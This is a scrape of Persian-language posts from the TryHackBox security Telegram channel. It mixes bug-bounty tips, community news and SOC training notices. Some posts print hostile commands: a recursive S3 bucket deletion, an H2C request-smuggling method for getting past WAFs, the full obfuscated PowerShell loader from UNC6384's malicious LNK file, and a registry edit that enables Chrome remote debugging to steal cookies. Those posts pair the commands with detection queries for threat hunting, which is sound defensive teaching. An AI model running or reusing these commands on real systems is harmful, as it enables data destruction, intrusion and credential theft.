Try Hack Box

🔖 ۲۵ ابزار برتر ریکان و اهداف آنها

شما از کدام ابزارها استفاده میکنید ؟

@TryHackBox

🪲 نکته باگ بانتی: takeover bucketهای S3 آسیب‌پذیر در کمتر از یک دقیقه! می‌خوای bucketهای Amazon S3 exposed مرتبط با تارگت رو شناسایی کنی؟ این روش سریع:

echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

🔍 بعد bucketهای public S3 رو چک کن:

aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com

💢 اگه نام bucket واضح نیست:

echo REDACTEDCOM | cariddi -e -s -info

⚠️ bucket آسیب‌پذیر پیدا کردی؟ هیچی delete نکن! 📌 این رو اجرا نکن. فقط برای آگاهی:

aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive

✅ همیشه responsible report کن. هرگز exploit نکن هدف کمک کردنه، نه آسیب زدن.

کدوم ابزار مثل cariddi رو برای S3 enum تست کردی که bucket open شکار کرد؟ تجربت رو کامنت کن.

@TryHackBox #باگ_بانتی

دوستان عزیز با توجه به وضعیت فعلی اینترنت، تصمیم داریم هرچه سریع‌تر سایت مجموعه را راه‌اندازی کنیم تا بتوانیم آموزش‌ها و برنامه‌های خود را به‌طور منظم در آن قرار دهیم. اگر شما علاقه‌مند به همکاری در این پروژه هستید و با تکنولوژی فرانت ری‌اکت (React) آشنا هستید، لطفاً به ما پیام دهید. برای داوطلبان گرامی مزایایی در نظر گرفته خواهد شد. برای کسب اطلاعات بیشتر و توضیحات تکمیلی، با ما در ارتباط باشید. @ThbxSupport

دوستان این روزها کسی دل و دماغ کاری رو نداره حتی خود شما با شرایط پیش اومده . دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید : @ThbxSupport

درود وقت بخیر دوستان با توجه به وضعیت فعلی اینترنت، تصمیم داریم هرچه سریع‌تر سایت مجموعه را راه‌اندازی کنیم تا بتوانیم آموزش‌ها و برنامه‌های خود را به‌طور منظم در آن قرار دهیم. اگر شما علاقه‌مند به همکاری در این پروژه هستید، لطفاً به ما پیام دهید. برای داوطلبان گرامی مزایایی در نظر گرفته خواهد شد. در حال حاضر، تنها بخش بک‌اند و دیتابیس سایت باقی مانده است که نیاز به انجام آن داریم. برای کسب اطلاعات بیشتر و توضیحات تکمیلی، با ما در ارتباط باشید. @ThbxSupport

پس از روزهایی پر از التهاب و سکوت، دوباره به تلگرام برگشتیم. کاش حال همگی‌ مان خوب باشد، اگرچه می‌دانیم چه بر ما گذشت. ما سطر به سطرِ کتابی را زندگی کردیم که خواندنش فقط اشک است و بغض. تسلیت به تمام هم‌وطنانی که در این چند روز سیاه، به سوگ عزیزانشان نشستند. ‏ما روزهایی رو گذروندیم که اگر کتاب بشه آدم‌های زیادی رو به گریه میندازه . تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن  🖤 از طرف مجموعه TryHackBox

بالاخره بعد از چند روز قطعی اینترنت به تلگرام دسترسی پیدا کردیم. نمیدونم موقتیه یا نه و امیدوارم حال تک تکتون خوب باشه . ‏ما روزهایی رو گذروندیم که اگر کتاب بشه آدم‌های زیادی رو به گریه میندازه . تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن 🖤

🪲 نکته حرفه‌ای باگ بانتی: #بایپس_ارتقا_H2C هدف: اپلیکیشن‌هایی که از ارتقا HTTP/2 Cleartext (h2c) استفاده میکنن. ایده اصلی: بسیاری از فایروال‌ های اپلیکیشن وب (WAFها) و reverse proxyها ترافیک HTTP/1.1 رو پردازش میکنن، اما بعد از ارتقا به HTTP/2، ترافیک رو درست inspect نمیکنن. چگونگی تست: 1. هدفی پیدا کن که هدر Upgrade: h2c رو قبول کنه (رایج در Java، gRPC و برخی reverse proxyها مثل Nginx). 2. یه درخواست اولیه HTTP/1.1 با هدر ارتقا بفرست:

GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade

3. اگه سرور موافقت کنه (با HTTP/1.1 101 Switching Protocols جواب بده)، اتصال حالا HTTP/2 شده. 4. بایپس: فریم‌های HTTP/2 malformed یا smuggled بساز و بفرست (مثلاً با هدر:method روی GET یا POST). WAF downstream ممکنه نتونه parse کنه، و این اجازه میده به endpointهای داخلی دسترسی پیدا کنی یا کنترل‌ های امنیتی رو بایپس کنی. چرا کار می‌کنه: مرز امنیتی اغلب فقط در لایه HTTP/1.1 وجود داره. بعد از ارتقا، ترافیک HTTP/2 ممکنه مستقیم به backend فوروارد بشه بدون inspect.

تجربتون از بایپس WAF با HTTP/2 رو به اشتراک بگذارید .

@TryHackBox #باگ_بانتی #هکینگ #امنیت_وب #بایپس_WAF #HTTP2

🟠 در این قسمت سرفصل‌های کلیدی زیر رو بررسی کردیم: - کلمات و اصطلاحات - چیستی مرکز عملیات امنیت - کار ها و وظایف در SOC - مدل های کارکردن و جریان کاری در SOC - نحوه بالا بردن مهارت در SOC این مباحث پایه‌ای، شما را برای ورود به دنیای امنیت سایبری آماده می‌کند. @TryHackBox #SOC #امنیت_سایبری #بوتکمپ_SOC

🚀 قسمت اول بوتکمپ SOC 0x4131!

دوستان گرامی به دلیل شرایط نابسامان فعلی کشور، فعالیت‌های ما به طور موقت فعالیتی نخواهیم داشت. تا بهبود اوضاع و بازگشت به شرایط بهتر، پیشنهاد می‌کنیم از آموزش‌های قبلی ما استفاده نمایید. در این روزهای دشوار، ما نیز در کنار مردم عزیز کشورمان ایستاده‌ایم و با آن‌ها همدردی می‌کنیم. امیدواریم روزهای روشن و پرامیدی در پیش رو داشته باشیم. با احترام 🖤

https://meet.google.com/yuc-ewhs-qyy لینک ورود به جلسه اضافه شید دوستان

به دلیل وصل نشدن بعضی از دوستان جلسه توی گوگل میت برگزار می شود منتظر لینک باشید

دوستان سوالات خود را کامنت کنید تا یک ساعت دیگه جلسه شروع میشه.

🚀 در دنیای فناوری اطلاعات و امنیت سایبری، تنها دانستن مفاهیم تئوری و گذروندن دوره‌های آموزشی کافی نیست — تجربه عملی و مهارت واقعی حرف اول رو می‌زنن. 🔐 پلتفرم Challenginno.ir با الهام از پلتفرم‌هایی مثل Hack The Box و TryHackMe، محیطی چالش‌محور برای علاقه‌مندان به امنیت سایبری فراهم کرده؛ جایی که می‌تونی مهارت‌هات رو در سناریوهای واقعی تقویت کنی. 🧠 چالش‌های متنوعی در حوزه‌هایی مثل: 🔸تست نفوذ و ارزیابی امنیتی 🔸تیم قرمز و تیم آبی 🔸فارنزیک دیجیتال 🔸شکار تهدید (Threat Hunting) و سایر زمینه‌های امنیت سایبری منتظر تو هستن! 🔥 همچنین دوره‌های تخصصی مبتنی بر چالش‌های امنیتی و نیز مسابقات مختلف نیز در این پلتفرم برگزار می شن. 📌 اگه دنبال یه مسیر برای یادگیری و تمرین در امنیت سایبری هستی، همین حالا به ما بپیوند: 🌐 وب‌سایت: https://challenginno.ir 📣 کانال تلگرام: https://t.me/challenginno

فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) داده‌های آرشیو شده است.

امروز بررسی می‌کنیم که مهاجمان چگونه از ابزار tar اکسپلویت می‌کنند و چگونه می‌توان از این موضوع برای شکار پیش‌ دستانه (Proactive Hunting) استفاده کرد.

بیایید به UNC6384 نگاه کنیم. مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"

این اسکریپت کارهای زیر را انجام می‌دهد: به‌دنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip می‌گردد محتوای آن را می‌خواند

یک بخش پنهان از داده‌ها که داخل این ZIP جاسازی شده را استخراج می‌کند (از بایت 721 به بعد) این بخش پنهان را در یک فایل موقت ذخیره می‌کند (rjnlzlkfe.ta) آن را با استفاده از tar استخراج می‌کند یک فایل اجرایی را اجرا می‌کند cnmpaui.exe : — یک فایل قانونی که برای side-loading استفاده می‌شود

 حالا روی tar تمرکز کنیم:

tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp

برای مثال، می‌توان موارد اجرای tar از طریق PowerShell را جست‌وجو کرد:

event_type: "processcreatewin"

AND

proc_p_file_path: "powershell.exe"

AND

proc_file_path: "tar.exe"

همچنین می‌توان به‌دنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:

event_type: "processcreatewin"

AND

proc_file_path: "tar.exe"

AND

cmdline: ("xvf" AND "temp")

به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟

➖➖➖➖➖➖➖➖➖➖➖➖➖ 🆔 @TryHackBox 🆔 @TryHackBoxOfficial 🆔 @TryHackBoxStory 🆔 @RadioZeroPod

مطمئنم که می‌دانید مهاجمان از قابلیت «remote debugging» اکسپلویت می‌ کنند تا کوکی‌ ها را از مرورگرهای وب استخراج کنند. امروز بررسی می‌ کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می‌ کنند. اگر به این گزارش نگاه کنید. متوجه می‌شوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:

reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f

برای مثال، می‌ توانیم سوءاستفاده از reg.exe را با نشانه‌های زیر جست‌وجو کنیم:

event_type: "processcreatewin"

AND

proc_file_path: "reg.exe"

AND

cmdline: "RemoteDebuggingAllowed"

یا می‌توان تمرکز را روی تغییر رجیستری گذاشت:

event_type: "registryvaluesetwin"

AND

reg_key_path: "RemoteDebuggingAllowed"

به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفاده‌ای در محیط‌های سازمانی چیست و چه لاگ‌ها یا کنترل‌های دیگری را می‌توان برای شناسایی زودهنگام آن به کار گرفت؟

➖➖➖➖➖➖➖➖➖➖➖➖➖ 🆔 @TryHackBox 🆔 @TryHackBoxOfficial 🆔 @TryHackBoxStory 🆔 @RadioZeroPod